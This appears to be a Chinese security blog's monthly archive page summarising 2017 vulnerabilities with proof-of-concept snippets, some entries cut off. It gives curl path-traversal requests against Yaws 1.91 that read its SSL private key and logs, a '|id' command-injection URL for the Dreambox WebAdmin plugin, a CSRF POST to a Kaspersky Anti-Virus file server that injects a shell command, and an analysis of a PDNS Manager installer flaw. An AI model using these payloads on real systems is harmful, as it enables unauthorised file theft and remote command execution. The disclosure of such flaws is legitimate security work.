博文

目前显示的是 七月, 2017的博文

AD

Yawsv1.91任意文件读取下载

Yaws v1.91 (Yet Another Web Server)存在一个任意文件读取下载漏洞,攻击者无需登录授权,即可可以利用该漏洞读取或下载任意文件。

POC:
       利用“%5C..”即可染过目录限制,访问到其他目录
       curl http://127.0.0.1:8080/%5C../ssl/yaws-key.pem
       curl http://127.0.0.1:8080/%5C../logs/localhost.8080.access

PDNSManager_RCE

影响版本:Git master 3bf4e28 (2016-12-12) - 2bb00ea (2017-05-22) 漏洞分析:PDNS Manager是用于管理Powerdns权威域名服务器的工具, PDNS Manager 安装时,会首先调用两个文件:api/install.php和install.php,install文档用于让用户填写用于数据库连接的用户名密码等信息,然后这些配置信息会通过POST方式传送到api/install.php,然后api/install.php尝试连接数据库。 try {         $db = new PDO("$input->type:dbname=$input->database;host=$input->host;port=$input->port", $input->user, $input->password); } catch (PDOException $e) {     $retval['status'] = "error";     $retval['message'] = serialize($e); }

如果api/install.php可以正常连接数据库,则会将数据库配置写入到以config/config-default.php为模板的config-user.php中,并进入下一步安装程序, $configFile = Array();
$configFile[] = ' $configFile[] = '$config[\'db_host\']=\''.addslashes($input->host)."';"; $configFile[] = '$config[\'db_user\']=\''.addslashes($input->user)."';"; $configFile[] = '$config[\'db_password\']= \''.addslashes($input->…

OpenDreamBox2.0.0_Plugin_WebAdmin_RCE

Dreambox的WebControl及web控制台,没有用户认证授权模块,打开即可访问到WEB控制台的各项功能,如果WEB控制台内安装了WebAdmin插件,因为该插件存在一个远程命令执行漏洞,可以导致攻击者执行任意系统命令。

POC:
       进入Dreambox的WebControl后,选择“Extra”如果目标安装有WebAdmin插件,可以使用如下模式执行命令。
       http://target.com/webadmin/script?command=|id

KasperskyAV_XSS&CSRF&RCE

漏洞简介
卡巴斯基的反病毒文件服务器存在一个WEB控制台,用于监控服务状态及进行一些配置操作。研究人员在版本为8.0.3.297的文件服务器上进行了多种测试。发现存在如下漏洞: POC
1、CSRF: Payload: /----- "notifier": {"Actions": [{"Command": "touch /tmp/pepperoni", "EventName": 22, "Enable": true, "__VersionInfo": "1 0"}] -----/
POST /cgi-bin/cgictl?action=setTaskSettings HTTP/1.1 Host: 127.0.0.1:9080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json, text/javascript, */* Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Referer: http://127.0.0.1:9080/ Content-Length: 3273 Cookie: wmc_useWZRDods=true; wmc_sid=690DE0005C5625A420255EFEBB3349F7; wmc_full_stat=1; wmc_logsSimpleMode=1; wmc_backupSimpleMode=1; wmc_quaSimpleMode=1; wmc_iconsole_lang=resource_en.js; wmc_show_settings_descr=false; iconsole_test; wmc_show_licence_descr=false Connection: close
taskId=7&settings=%7B%22ctime%22%3A%201490796963%2C%20%22notifier%22%3A%2…